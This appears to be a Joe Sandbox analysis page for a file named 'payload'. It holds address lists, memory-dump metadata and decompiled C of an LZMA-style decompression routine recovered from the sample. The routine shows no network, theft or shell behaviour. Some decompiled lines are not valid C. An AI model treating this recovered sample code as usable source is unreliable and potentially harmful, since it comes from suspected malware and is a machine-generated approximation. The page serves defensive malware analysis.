0x00406882
0x00406888
0x0040688a
0x0040688a
0x0040688a
0x0040688d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040697a
0x0040697e
0x004069a0
0x004069a3
0x004069ad
0x00000000
0x004069ad
0x00406980
0x00406983
0x00406987
0x0040698a
0x0040698a
0x0040698d
0x00000000
0x00000000
0x00406a37
0x00406a3b
0x00406a59
0x00406a59
0x00406a59
0x00406a60
0x00406a67
0x00406a6e
0x00406a6e
0x00000000
0x00406a6e
0x00406a3d
0x00406a40
0x00406a43
0x00406a46
0x00406a4d
0x00406991
0x00406991
0x00406994
0x00000000
0x00000000
0x00406b28
0x00406b2b
0x00000000
0x00000000
0x00406762
0x00406764
0x0040676b
0x0040676c
0x0040676e
0x00406771
0x00000000
0x00000000
0x00406779
0x0040677c
0x0040677f
0x00406781
0x00406783
0x00406783
0x00406784
0x00406787
0x0040678e
0x00406791
0x0040679f
0x00000000
0x00000000
0x00406a75
0x00406a75
0x00406a78
0x00406a7f
0x00000000
0x00000000
0x00406a84
0x00406a84
0x00406a88
0x00406bc0
0x00000000
0x00406bc0
0x00406a8e
0x00406a91
0x00406a94
0x00406a98
0x00406a9b
0x00406aa1
0x00406aa3
0x00406aa3
0x00406aa3
0x00406aa6
0x00406aa9
0x00406aa9
0x00406aa9
0x00406aa9
0x00406aac
0x00406aac
0x00406ab0
0x00406b10
0x00406b13
0x00406b18
0x00406b19
0x00406b1b
0x00406b1d
0x00406b20
0x00000000
0x00406b20
0x00406ab2
0x00406ab8
0x00406abb
0x00406abe
0x00406ac1
0x00406ac4
0x00406ac7
0x00406aca
0x00406acd
0x00406ad0
0x00406ad3
0x00406aec
0x00406aef
0x00406af2
0x00406af5
0x00406af9
0x00406afb
0x00406afb
0x00406afc
0x00406aff
0x00406ad5
0x00406ad5
0x00406add
0x00406ae2
0x00406ae4
0x00406ae7
0x00406ae7
0x00406b02
0x00406b09
0x00000000
0x00406b0b
0x00000000
0x00406b0b
0x00000000
0x004067a7
0x004067aa
0x004067e0
0x00406910
0x00406910
0x00406910
0x00406910
0x00406913
0x00406913
0x00406916
0x00406918
0x00406ba2
0x00000000
0x00406ba2
0x0040691e
0x00406921
0x00000000
0x00000000
0x00406927
0x0040692b
0x0040692e
0x0040692e
0x0040692e
0x00000000
0x0040692e
0x004067ac
0x004067ae
0x004067b0
0x004067b2
0x004067b5
0x004067b6
0x004067b8
0x004067ba
0x004067bd
0x004067c0
0x004067d6
0x004067db
0x00406813
0x00406813
0x00406817
0x00406843
0x00406845
0x0040684c
0x0040684f
0x00406852
0x00406852
0x00406857
0x00406857
0x00406859
0x0040685c
0x00406863
0x00406866
0x00406893
0x00406893
0x00406896
0x00406899
0x0040690d
0x0040690d
0x0040690d
0x00000000
0x0040690d
0x0040689b
0x004068a1
0x004068a4
0x004068a7
0x004068aa
0x004068ad
0x004068b0
0x004068b3
0x004068b6
0x004068b9
0x004068bc
0x004068d5
0x004068d7
0x004068da
0x004068db
0x004068de
0x004068e0
0x004068e3
0x004068e5
0x004068e7
0x004068ea
0x004068ec
0x004068ef
0x004068f3
0x004068f5
0x004068f5
0x004068f6
0x004068f9
0x004068fc
0x004068be
0x004068be
0x004068c6
0x004068cb
0x004068cd
0x004068d0
0x004068d0
0x004068ff
0x00406906
0x00406890
0x00406890
0x00406890
0x00406890
0x00000000
0x00406908
0x00000000
0x00406908
0x00406906
0x00406819
0x0040681c
0x0040681e
0x00406821
0x00406824
0x00406827
0x00406829
0x0040682c
0x0040682f
0x0040682f
0x00406832
0x00406832
0x00406835
0x0040683c
0x00406810
0x00406810
0x00406810
0x00406810
0x00000000
0x0040683e
0x00000000
0x0040683e
0x0040683c
0x004067c2
0x004067c5
0x004067c7
0x004067ca
0x00000000
0x00000000
0x00406529
0x00406529
0x0040652d
0x00406b72
0x00000000
0x00406b72
0x00406533
0x00406536
0x00406539
0x0040653c
0x0040653f
0x00406542
0x00406545
0x00406547
0x0040654a
0x0040654d
0x00406550
0x00406552
0x00406552
0x00406552
0x00000000
0x00000000
0x00000000
0x00000000
0x00406931
0x00406931
0x00406931
0x00406935
0x00000000
0x00000000
0x0040693b
0x0040693e
0x00406941
0x00406944
0x00406946
0x00406946
0x00406946
0x00406949
0x0040694c
0x0040694f
0x00406952
0x00406955
0x00406958
0x00406959
0x0040695b
0x0040695b
0x0040695b
0x0040695e
0x00406961
0x00406964
0x00406967
0x0040696a
0x0040696e
0x00406970
0x00406973
0x00000000
0x00406975
0x00000000
0x00406975
0x00406973
0x00406ba8
0x00000000
0x00000000
0x004061d7

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adca5b2b6989107afceee3a061708c38461c5fc9fc0daf484043dfdf7e09805a
Instruction ID: d456333056e0522eb9a81365918d8492ce98a85054e5b278218ea4b7938feab7
Opcode Fuzzy Hash: adca5b2b6989107afceee3a061708c38461c5fc9fc0daf484043dfdf7e09805a
Instruction Fuzzy Hash: E1814671D04228CFDF24CFA8C8847ADBBB1FB44305F25816AD416BB281C778AA96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406195 Relevance: 5.2, APIs: 4, Instructions: 198
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406195(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00406BE7))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12); // executed
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
